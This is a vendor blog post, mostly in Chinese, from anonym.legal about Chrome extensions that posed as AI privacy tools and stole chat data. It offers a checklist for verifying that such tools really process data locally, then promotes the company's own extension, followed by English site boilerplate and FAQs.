anonym.legal

By · Last updated 2026-04-19

返回博客人工智能安全

您的AI隐私工具是否正在窃取您的数据?

67%的AI Chrome扩展程序会收集用户数据。2025年12月的事件中,90万用户因伪装成隐私保护工具的扩展程序而遭受损失。

April 19, 20268 分钟阅读
privacy extension verificationlocal processing trustextension data collection auditAI privacy tool evaluationChrome extension security checklist

窃取数据的隐私工具

2025年12月,以AI隐私保护为卖点的Chrome工具被发现存在间谍行为。它们捕获了完整的聊天记录,并将内容发送至攻击者控制的服务器。

这正是核心悖论所在:隐私工具本身成了威胁来源。

Caviard.ai发现,67%的AI Chrome扩展程序会收集用户数据。其中部分会披露这一行为,其他则不会。但披露本身并非核心问题,真正的问题在于:该工具的架构设计是否使数据窃取在结构上不可能发生——还是仅凭政策约束加以禁止。

DLA Piper 2025年GDPR报告显示,2024年平均罚款金额同比2023年上涨34%。这一趋势提高了数据保护官在为员工批准浏览器工具时的风险代价。

真正的本地处理是什么样的

真正的本地处理工具在浏览器内部运行其检测模型。该模型随安装包一起提供或一次性下载完成。此后,任何内容都不会发送至发布者的服务器。

唯一的出站流量是发送至AI服务的脱敏提示词,以及常规浏览器请求(如更新检查)。内容从不经过发布者的网络。

这种架构设计可以被测试和验证。发布者的承诺本身不可轻信——2025年12月的事件已经证明了这一点。

如何检验任何隐私工具

不要问发布者是否承诺保护隐私,要问该工具的设计是否使数据窃取在技术上不可能发生。

网络测试: 在受监控的网络中安装该工具,将虚假的个人标识符粘贴到测试AI账户中,观察30秒内的所有出站连接。如果有任何流量流向AI平台或工具更新服务器以外的域名,说明您的内容正被路由至其他地方。

代码审查: Chrome扩展程序是JavaScript包,可以被反编译。真正的本地处理工具在其检测代码中没有网络调用。检测模块中没有fetchXMLHttpRequestWebSocket是良好信号,它们的出现则是否决条件。

权限检查: Chrome Manifest V3要求明确的权限声明。本地处理工具不需要在浏览器外部发送内容的权限。剪贴板访问权限加上宽泛的网络权限——且没有明确原因——是危险信号。

发布者核查: Chrome网上应用店的已验证发布者状态需要域名证明和身份文件。销售AI隐私工具的新发布者配合新注册域名,需要额外审查。2025年12月的攻击者使用短暂身份来规避检测。

90万用户受到影响

Astrix Security对2025年12月事件的分析显示,90万用户遭受了伪装成隐私工具的扩展程序攻击。这些用户选择这些工具,正是为了保护他们的AI会话,而工具却适得其反。

一次员工账户被入侵就可能暴露客户记录、法律文件和内部计划。安全合规概览详细解释了这一风险链条的运作机制。

选择可验证的工具

anonym.legal Chrome扩展程序在浏览器内部完全本地化运行个人信息检测,任何信息都不会发送至anonym.legal服务器。

恶意扩展程序anonym.legal
处理位置远程服务器仅限浏览器本地
访问范围完整会话捕获仅在激活时
用户可验证是——测试网络即可

工作原理:

  1. 您粘贴包含个人标识符的文本
  2. 检测在您的浏览器中本地运行
  3. 姓名和ID变为占位符——「Jane Smith」变为[PERSON_1]
  4. 脱敏后的文本发送至AI
  5. AI回复在本地为您还原

合规中心包含完整的实体类型列表和企业审计详情。

参考资料

相关文章

人工智能安全

AI Coding Assistants Leak Production PII

Unit test fixtures with real customer records. Log files with production data for debugging. GitHub found 39 million secrets leaked in 2024.

人工智能安全

Internal Wiki PII: Confluence Customer Data

Support teams document processes with screenshots of customer accounts. Over 3 years, that's thousands of GDPR data minimization violations in your.

人工智能安全

Screenshot PII: Leaks in Internal Tools

Slack, Teams, Jira, and email regularly receive screenshots containing customer PII. This access-control violation bypasses every DLP tool.

准备好保护您的数据了吗?

开始使用 285 种实体类型在 48 种语言中匿名化 PII。

开始免费试用查看功能

About this page

We update this page when our platform or the law changes.

Read our founder note for how we work.

Each change shows up in the timestamp at the top.

Related reading

We follow these rules

  • GDPR (EU 2016/679).
  • ISO/IEC 27001:2022.
  • NIS2 (EU 2022/2555).
  • HIPAA safe harbor under 45 CFR § 164.514(b)(2).

Our promise

We do not sell your data.

We do not train models on your text.

We store your files in Germany.

You can delete your account at any time.

You own your work.

Where we run

Our servers live in Falkenstein, Germany.

We use Hetzner. They hold ISO 27001 certification.

All data stays in the EU.

Backups run every day.

Need help?

Email support@anonym.legal.

We reply within one business day.

How we test

We run a full check suite on every release.

Each surface gets its own sweep script and report.

Human reviewers spot-check the output each week.

We track recall and precision on a labelled set.

Bad runs block the deploy.

What we never do

  • We never sell your information to third parties.
  • We never train models on what you upload.
  • We never keep your work after you delete it.
  • We never share keys with any outside firm.
  • We never run ads inside the product.

Plans in plain words

We sell credits, not seats.

One credit covers one short job.

Long jobs use a few credits each.

You can top up at any time.

Unused credits roll over each month.

Read the plans page for current rates.

Who built this

A small team of engineers and lawyers built this.

We ship from Europe and work in the open.

Our founder note spells out why we started.

Where to start

How the parts fit

A browser add-on cleans text inside Chrome.

A Word plug-in handles drafts in Office.

A small desktop tool works on whole folders.

An agent protocol link feeds large models safely.

All four share one core engine and one rule set.

Words from our team

We started this work after a lunch about cookies.

One friend kept getting odd ads on her phone.

We asked why a court file leaked through a draft.

We sketched the first build on a napkin that week.

By month three we had a tiny demo for a friend.

She used it on her first case the next day.

Common questions we hear

Can the tool read scanned PDFs? Yes, with OCR.

Does it work on long files? Yes, in small chunks.

Can I roll my own rule set? Yes, save it as a preset.

Does it run offline? The desktop build runs offline.

Do you keep my files? No, the cloud build wipes after each run.

Will it learn from my work? No, we never train on inputs.

A short tour of the workflow

Upload a file or paste a snippet of prose.

Pick the entities you want gone from the draft.

Choose a method: replace, mask, hash, encrypt, or redact.

Press run and watch the side panel show each hit.

Skim the result and tweak any rule that misfired.

Save the cleaned file or send it to a teammate.